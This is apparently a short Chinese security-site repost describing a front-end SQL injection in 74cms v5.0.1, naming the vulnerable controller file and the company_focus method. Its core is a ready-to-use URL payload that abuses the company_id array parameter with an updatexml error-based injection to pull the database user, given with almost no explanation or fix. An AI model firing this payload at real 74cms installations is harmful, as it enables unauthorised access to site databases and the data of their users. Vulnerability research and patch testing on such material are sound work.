[HW漏洞]74cms v5.0.1 前台sql注入(旧)

admin
admin
admin
102157
文章
87
评论
2021年4月16日05:50:46评论251 views字数 438阅读1分27秒阅读模式

文件位置

74cmsuploadApplicationHomeControllerAjaxPersonalController.class.php

 

方法

function company_focus($company_id)

 

payload

http://0-sec.org/74cms/5.0.1/upload/index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=aaaaaaa") and updatexml(1,concat(0x7e,(select user())),0) -- a

 

[HW漏洞]74cms v5.0.1 前台sql注入(旧)

相关推荐: SQL注入漏洞靶场实战-1

Sqli - labs 安装与lesson1-4实战所需环境:1. PHP2. MYSQL3. Apache/Nginx以上三项Debian都自带了,2与3直接开启即可,但是有几点要注意:1. Debian下的MySql每次登录的时候默认需要授权,即必须使用s…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月16日05:50:46
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   [HW漏洞]74cms v5.0.1 前台sql注入(旧)https://cn-sec.com/archives/335828.html

发表评论

匿名网友 填写信息